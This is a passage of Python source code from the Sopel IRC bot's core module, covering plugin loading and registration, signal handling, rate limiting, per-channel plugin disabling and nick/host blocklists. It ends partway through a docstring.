LOGGER = logging.getLogger(__name__)
QUIT_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR1', 'SIGTERM', 'SIGINT']
if hasattr(signal, name)
]
RESTART_SIGNALS = [
getattr(signal, name)
for name in ['SIGUSR2', 'SIGILL']
if hasattr(signal, name)
]
SIGNALS = QUIT_SIGNALS + RESTART_SIGNALS
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super(Sopel, self).__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
self._running_triggers = []
self._running_triggers_lock = threading.Lock()
self._plugins = {}
self._rules_manager = plugin_rules.Manager()
self._scheduler = plugin_jobs.Scheduler(self)
self._url_callbacks = tools.SopelMemory()
"""Tracking of manually registered URL callbacks.
Should be manipulated only by use of :meth:`register_url_callback` and
:meth:`unregister_url_callback` methods, which are deprecated.
Remove in Sopel 9, along with the above related methods.
"""
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
        function objects to the time at which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
        For servers that do not support IRCv3, this will be empty.
"""
self.channels = tools.SopelIdentifierMemory()
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelIdentifierMemory()
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must share at least one mutual channel.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
plugins. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
@property
def rules(self):
"""Rules manager."""
return self._rules_manager
@property
def scheduler(self):
"""Job Scheduler. See :func:`sopel.plugin.interval`."""
return self._scheduler
@property
def command_groups(self):
"""A mapping of plugin names to lists of their commands.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# This was supposed to be deprecated, but the built-in help plugin needs it
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
result = {}
for plugin, commands in plugin_commands:
if plugin not in result:
result[plugin] = list(sorted(commands.keys()))
else:
result[plugin].extend(commands.keys())
result[plugin] = list(sorted(result[plugin]))
return result
@property
def doc(self):
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the plugin's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
.. versionchanged:: 7.1
This attribute is now generated on the fly from the registered list
of commands and nickname commands.
"""
# TODO: create a new, better, doc interface to remove it
plugin_commands = itertools.chain(
self._rules_manager.get_all_commands(),
self._rules_manager.get_all_nick_commands(),
)
commands = (
(command, command.get_doc(), command.get_usages())
for plugin, commands in plugin_commands
for command in commands.values()
)
return dict(
(name, (doc.splitlines(), [u['text'] for u in usages]))
for command, doc, usages in commands
for name in ((command.name,) + command.aliases)
)
@property
def hostmask(self) -> Optional[str]:
"""The current hostmask for the bot :class:`~sopel.tools.target.User`.
:return: the bot's current hostmask if the bot is connected and in
            at least one channel; ``None`` otherwise
:rtype: Optional[str]
"""
if not self.users or self.nick not in self.users:
# bot must be connected and in at least one channel
return None
return self.users.get(self.nick).hostmask
def has_channel_privilege(self, channel, privilege):
"""Tell if the bot has a ``privilege`` level or above in a ``channel``.
:param str channel: a channel the bot is in
:param int privilege: privilege level to check
:raise ValueError: when the channel is unknown
This method checks the bot's privilege level in a channel, i.e. if it
has this level or higher privileges::
>>> bot.channels['#chan'].privileges[bot.nick] = plugin.OP
>>> bot.has_channel_privilege('#chan', plugin.VOICE)
True
The ``channel`` argument can be either a :class:`str` or a
:class:`sopel.tools.Identifier`, as long as Sopel joined said channel.
If the channel is unknown, a :exc:`ValueError` will be raised.
"""
if channel not in self.channels:
raise ValueError('Unknown channel %s' % channel)
return self.channels[channel].has_privilege(self.nick, privilege)
# signal handlers
def set_signal_handlers(self):
"""Set signal handlers for the bot.
Before running the bot, this method can be called from the main thread
        to set up signals. If the bot is connected, upon receiving a signal it
will send a ``QUIT`` message. Otherwise, it raises a
:exc:`KeyboardInterrupt` error.
.. note::
Per the Python documentation of :func:`signal.signal`:
When threads are enabled, this function can only be called from
the main thread; attempting to call it from other threads will
cause a :exc:`ValueError` exception to be raised.
"""
for obj in SIGNALS:
signal.signal(obj, self._signal_handler)
def _signal_handler(self, sig, frame):
if sig in QUIT_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got quit signal, sending QUIT to server.")
self.quit('Closing')
else:
self.hasquit = True # mark the bot as "want to quit"
LOGGER.warning("Got quit signal.")
raise KeyboardInterrupt
elif sig in RESTART_SIGNALS:
if self.backend.is_connected():
LOGGER.warning("Got restart signal, sending QUIT to server.")
self.restart('Restarting')
else:
LOGGER.warning("Got restart signal.")
self.wantsrestart = True # mark the bot as "want to restart"
self.hasquit = True # mark the bot as "want to quit"
raise KeyboardInterrupt
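    # For example, on platforms that define these signals, ``kill -USR1 <pid>``
    # or ``kill -TERM <pid>`` makes a connected bot send QUIT, while
    # ``kill -USR2 <pid>`` makes it restart (see QUIT_SIGNALS/RESTART_SIGNALS
    # above).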
# setup
def setup(self):
"""Set up Sopel bot before it can run.
The setup phase is in charge of:
* setting up logging (configure Python's built-in :mod:`logging`)
* setting up the bot's plugins (load, setup, and register)
* starting the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.post_setup()
def setup_logging(self):
"""Set up logging based on config options."""
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
"""Load plugins into the bot."""
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info("Loading plugins...")
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error loading %s: %s", name, e)
except SystemExit:
load_error = load_error + 1
LOGGER.exception(
"Error loading %s (plugin tried to exit)", name)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception("Error in %s setup: %s", name, e)
else:
load_success = load_success + 1
LOGGER.info("Plugin loaded: %s", name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
"Registered %d plugins, %d failed, %d disabled",
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
# post setup
def post_setup(self):
"""Perform post-setup actions.
This method handles everything that should happen after all the plugins
are loaded, and before the bot can connect to the IRC server.
At the moment, this method checks for undefined configuration options,
and starts the job scheduler.
.. versionadded:: 7.1
"""
settings = self.settings
for section_name, section in settings.get_defined_sections():
for option_name in settings.parser.options(section_name):
if not hasattr(section, option_name):
LOGGER.warning(
"Config option `%s.%s` is not defined by its section "
"and may not be recognized by Sopel.",
section_name,
option_name,
)
self._scheduler.start()
# plugins management
def reload_plugin(self, name):
"""Reload a plugin.
:param str name: name of the plugin to reload
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
This function runs the plugin's shutdown routine and unregisters the
plugin from the bot. Then this function reloads the plugin, runs its
setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def reload_plugins(self):
"""Reload all registered plugins.
First, this function runs all plugin shutdown routines and unregisters
all plugins. Then it reloads all plugins, runs their setup routines, and
registers them again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove plugin rules, jobs, shutdown functions, and url callbacks
self._rules_manager.unregister_plugin(name)
self._scheduler.unregister_plugin(name)
self.unregister_shutdowns(shutdowns)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
# callable management
@deprecated(
reason="Replaced by specific `unregister_*` methods.",
version='7.1',
removed_in='8.0')
def unregister(self, obj):
"""Unregister a shutdown method.
:param obj: the shutdown method to unregister
:type obj: :term:`object`
This method was used to unregister anything (rules, commands, urls,
jobs, and shutdown methods), but since everything can be done by other
means, there is no use for it anymore.
"""
callable_name = getattr(obj, "__name__", 'UNKNOWN')
if hasattr(obj, 'interval'):
self.unregister_jobs([obj])
if callable_name == "shutdown" and obj in self.shutdown_methods:
self.unregister_shutdowns([obj])
@deprecated(
reason="Replaced by specific `register_*` methods.",
version='7.1',
removed_in='8.0')
def register(self, callables, jobs, shutdowns, urls):
"""Register rules, jobs, shutdown methods, and URL callbacks.
:param callables: an iterable of callables to register
:type callables: :term:`iterable`
:param jobs: an iterable of functions to periodically invoke
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions to call on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions to call when matched against a URL
:type urls: :term:`iterable`
The ``callables`` argument contains a list of "callable objects", i.e.
objects for which :func:`callable` will return ``True``. They can be:
* a callable with rules (will match triggers with a regex pattern)
* a callable without rules (will match any triggers, such as events)
* a callable with commands
* a callable with nick commands
* a callable with action commands
It is possible to have a callable with rules, commands, and nick
commands configured. It should not be possible to have a callable with
commands or nick commands but without rules.
"""
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def register_callables(self, callables):
match_any = re.compile(r'.*')
settings = self.settings
for callbl in callables:
rules = getattr(callbl, 'rule', [])
lazy_rules = getattr(callbl, 'rule_lazy_loaders', [])
find_rules = getattr(callbl, 'find_rules', [])
lazy_find_rules = getattr(callbl, 'find_rules_lazy_loaders', [])
search_rules = getattr(callbl, 'search_rules', [])
lazy_search_rules = getattr(callbl, 'search_rules_lazy_loaders', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
is_rule = any([
rules,
lazy_rules,
find_rules,
lazy_find_rules,
search_rules,
lazy_search_rules,
])
is_command = any([commands, nick_commands, action_commands])
if rules:
rule = plugin_rules.Rule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_rules:
try:
rule = plugin_rules.Rule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register rule: %s', err)
if find_rules:
rule = plugin_rules.FindRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_find_rules:
try:
rule = plugin_rules.FindRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register find rule: %s', err)
if search_rules:
rule = plugin_rules.SearchRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_search_rules:
try:
rule = plugin_rules.SearchRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register search rule: %s', err)
if commands:
rule = plugin_rules.Command.from_callable(settings, callbl)
self._rules_manager.register_command(rule)
if nick_commands:
rule = plugin_rules.NickCommand.from_callable(
settings, callbl)
self._rules_manager.register_nick_command(rule)
if action_commands:
rule = plugin_rules.ActionCommand.from_callable(
settings, callbl)
self._rules_manager.register_action_command(rule)
if not is_command and not is_rule:
callbl.rule = [match_any]
self._rules_manager.register(
plugin_rules.Rule.from_callable(self.settings, callbl))
def register_jobs(self, jobs):
for func in jobs:
job = sopel.tools.jobs.Job.from_callable(self.settings, func)
self._scheduler.register(job)
def unregister_jobs(self, jobs):
for job in jobs:
self._scheduler.remove_callable_job(job)
def register_shutdowns(self, shutdowns):
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods = self.shutdown_methods + list(shutdowns)
def unregister_shutdowns(self, shutdowns):
self.shutdown_methods = [
shutdown
for shutdown in self.shutdown_methods
if shutdown not in shutdowns
]
def register_urls(self, urls):
for func in urls:
url_regex = getattr(func, 'url_regex', [])
url_lazy_loaders = getattr(func, 'url_lazy_loaders', None)
if url_regex:
rule = plugin_rules.URLCallback.from_callable(
self.settings, func)
self._rules_manager.register_url_callback(rule)
if url_lazy_loaders:
try:
rule = plugin_rules.URLCallback.from_callable_lazy(
self.settings, func)
self._rules_manager.register_url_callback(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error("Cannot register URL callback: %s", err)
@deprecated(
reason="Replaced by `say` method.",
version='6.0',
removed_in='8.0')
def msg(self, recipient, text, max_messages=1):
"""Old way to make the bot say something on IRC.
:param str recipient: nickname or channel to which to send message
:param str text: message to send
:param int max_messages: split ``text`` into at most this many messages
if it is too long to fit in one (optional)
.. deprecated:: 6.0
Use :meth:`say` instead. Will be removed in Sopel 8.
"""
self.say(text, recipient, max_messages)
# message dispatch
def call_rule(self, rule, sopel, trigger):
# rate limiting
if not trigger.admin and not rule.is_unblockable():
if rule.is_rate_limited(trigger.nick):
return
if not trigger.is_privmsg and rule.is_channel_rate_limited(trigger.sender):
return
if rule.is_global_rate_limited():
return
# channel config
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
if '*' in disabled_plugins:
return
elif rule.get_plugin_name() in disabled_plugins:
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
disabled_commands = disabled_commands.get(rule.get_plugin_name(), [])
if rule.get_rule_label() in disabled_commands:
return
try:
rule.execute(sopel, trigger)
except KeyboardInterrupt:
raise
except Exception as error:
self.error(trigger, exception=error)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching rules;
it will retrieve them by order of priority, and execute them. It runs
triggered rules in separate threads, unless they are marked otherwise.
However, it won't run triggered blockable rules at all when they can't
be executed for blocked nickname or hostname.
.. seealso::
The pattern matching is done by the
:class:`Rules Manager<sopel.plugins.rules.Manager>`.
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_rules = set()
# account info
nick = pretrigger.nick
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
for rule, match in self._rules_manager.get_triggered_rules(self, pretrigger):
trigger = Trigger(self.settings, pretrigger, match, account)
is_unblockable = trigger.admin or rule.is_unblockable()
if blocked and not is_unblockable:
list_of_blocked_rules.add(str(rule))
continue
wrapper = SopelWrapper(
self, trigger, output_prefix=rule.get_output_prefix())
if rule.is_threaded():
# run in a separate thread
targs = (rule, wrapper, trigger)
t = threading.Thread(target=self.call_rule, args=targs)
plugin_name = rule.get_plugin_name()
rule_label = rule.get_rule_label()
t.name = '%s-%s-%s' % (t.name, plugin_name, rule_label)
t.start()
running_triggers.append(t)
else:
# direct call
self.call_rule(rule, wrapper, trigger)
# update currently running triggers
self._update_running_triggers(running_triggers)
if list_of_blocked_rules:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_rules),
block_type,
)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
# event handlers
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the job scheduler that errored
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
:param scheduler: the job scheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.utcnow()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
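    # For example, a ``core.host_blocks`` entry such as ``.*\.example\.com``
    # blocks any user whose hostname ends in ``example.com``: entries are
    # treated as case-insensitive regexes anchored to the full hostname, or
    # matched as literal strings.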
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
"""Internal bot shutdown method."""
LOGGER.info("Shutting down")
# Stop Job Scheduler
LOGGER.info("Stopping the Job Scheduler.")
self._scheduler.stop()
try:
self._scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception("Unable to stop the Job Scheduler.")
else:
LOGGER.info("Job Scheduler stopped.")
self._scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
"Calling shutdown for %d plugins.", len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
"Calling %s.%s",
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception("Error calling shutdown method: %s", e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
# URL callbacks management
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Stores registered callbacks in an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
self._url_callbacks[pattern] = callback
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Deletes registered callbacks from an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
try:
del self._url_callbacks[pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. versionchanged:: 8.0
Searches for registered callbacks in an internal property instead
of ``bot.memory['url_callbacks']``.
.. deprecated:: 8.0
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in self._url_callbacks.items():
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper(object):
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1, truncation='', trailing=''):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``message`` into at most this many
messages if it is too long to fit into one
line (optional)
:param str truncation: string to indicate that the ``message`` was
truncated (optional)
